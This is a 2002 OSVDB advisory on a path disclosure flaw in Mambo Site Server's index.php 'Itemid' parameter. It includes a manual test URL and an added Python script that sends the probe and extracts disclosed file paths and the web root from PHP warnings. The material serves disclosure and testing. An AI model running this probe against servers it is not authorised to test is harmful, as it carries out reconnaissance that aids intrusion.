Mambo Site Server index.php Itemid Variable Path Disclosure

2002-12-12T00:00:00
ID OSVDB:7510
Type osvdb
Reporter euronymous(just-a-user@yandex.ru)
Modified 2002-12-12T00:00:00

Description

Vulnerability Description

Mambo Site Server contains a flaw that may lead to an unauthorized information disclosure. The flaw exists because the application does not validate the 'Itemid' variable when it is submitted to the 'index.php' script. It is possible for a remote attacker to send a specially crafted request to 'index.php' (for example, a non-numeric 'Itemid' value) that causes an error message to be returned which reveals the installation path, resulting in a loss of confidentiality.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Mambo Site Server's 'index.php' script does not validate the 'Itemid' variable; an invalid value causes an error message that reveals the installation path to a remote attacker, resulting in a loss of confidentiality.

Manual Testing Notes

http://[victim]/mambo/index.php?Itemid=invalid_string
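The following is an added example, not part of the OSVDB record or of Mambo's own code. It builds the probe URL from the manual testing note above and parses the PHP warning text that a path-disclosure response typically contains ("... in /path/file.php on line N"), extracting the disclosed file paths and the common web-root directory. The sample response body, the host name victim.example and the function names are assumptions constructed for the example; the live probe() helper is included but not invoked, so the rest runs offline.

```python
import posixpath
import re
import urllib.error
import urllib.request
from urllib.parse import urlencode, urljoin

# Shape of a PHP warning/notice once HTML tags are stripped:
#   "... in /home/www/mambo/includes/database.php on line 84"
# Accepts Unix absolute paths and Windows drive paths (C:\...).
PHP_ERROR_RE = re.compile(
    r"\bin\s+((?:/|[A-Za-z]:\\)[^\s<>\"']+?\.php)\s+on\s+line\s+(\d+)",
    re.IGNORECASE,
)
HTML_TAG_RE = re.compile(r"<[^>]+>")

# Constructed sample response (assumption): what a PHP 4 host with
# display_errors enabled might return for the probe URL. Not real Mambo output.
SAMPLE_RESPONSE = """<b>Warning</b>:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/www/mambo/includes/database.php</b> on line <b>84</b><br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/www/mambo/index.php</b> on line <b>231</b><br />
<html><body>Site content follows...</body></html>
"""


def build_test_url(base_url, itemid="invalid_string"):
    """Return the probe URL from the advisory's manual testing note."""
    return urljoin(base_url, "index.php") + "?" + urlencode({"Itemid": itemid})


def find_disclosed_paths(body):
    """Return sorted unique (path, line) tuples found in PHP error text.

    Tags are stripped first so both HTML-decorated and plain-text errors match.
    """
    text = HTML_TAG_RE.sub("", body)
    return sorted({(m.group(1), int(m.group(2))) for m in PHP_ERROR_RE.finditer(text)})


def install_root(paths):
    """Longest common directory of the disclosed paths, i.e. the likely web root.

    Backslashes are normalised so Windows paths can be compared the same way;
    mixing Unix and Windows paths in one response is not expected.
    """
    if not paths:
        return None
    dirs = [posixpath.dirname(p.replace("\\", "/")) for p, _ in paths]
    return posixpath.commonpath(dirs)


def probe(base_url, timeout=10):
    """Live check (not run in this example): fetch the probe URL and parse it.

    The warnings may ride on a 500 response, so the error body is parsed too.
    """
    req = urllib.request.Request(
        build_test_url(base_url), headers={"User-Agent": "osvdb-7510-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", "replace")
    return find_disclosed_paths(body)


if __name__ == "__main__":
    print(build_test_url("http://victim.example/mambo/"))
    found = find_disclosed_paths(SAMPLE_RESPONSE)
    for path, line in found:
        print(f"disclosed: {path} (line {line})")
    print("install root:", install_root(found))
```

The probe only tells you something when the server echoes PHP errors to the client (display_errors on), which is the condition the manual test relies on; a hardened host with display_errors off will return no paths even though the underlying lack of input validation is unchanged.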

References:

Vendor URL: http://www.miro.com.au/
Related OSVDB ID: 7509
Related OSVDB ID: 7511
Related OSVDB ID: 7512
Related OSVDB ID: 7513
Related OSVDB ID: 7514
Related OSVDB ID: 7515
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-12/0111.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0028.html
ISS X-Force ID: 10856